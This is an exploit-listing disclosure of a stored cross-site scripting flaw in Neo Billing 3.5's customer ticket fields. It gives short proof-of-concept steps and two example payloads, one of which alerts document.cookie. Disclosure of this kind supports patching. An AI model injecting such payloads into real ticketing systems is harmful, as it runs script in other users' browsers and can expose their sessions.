Exploits / Vulnerability Discovered : 2019-08-19 |
Type : webapps |
Platform : php
This exploit / vulnerability Neo billing 3.5 persistent crosssite scripting is for educational purposes only and if it is used you will do on your own risk!
# Neo Billing os an accounting, invoicing and CRM PHP script, with over 500 installations.
# Due to improper input fields data filtering, version 3.5 (and possibly previous versions), are affected by a stored XSS vulnerability.
[Proof of Concept]
# 1. Authorization as customer (regular user account) [//host/neo/crm/user/login]
# 2. Closing an input field tag and injecting code into 'Subject' or 'Description' text fields [//host/neo/crm/tickets/addticket]
# 3. The code is stored [//host/neo/crm/tickets] ∨ [//host/neo/crm/tickets/thread/?id=ticketid]
[Example paylods]
# Example payload: "><img src="x" onerror="alert('XSS');">
# Example payload: "><script>alert(document.cookie)</script>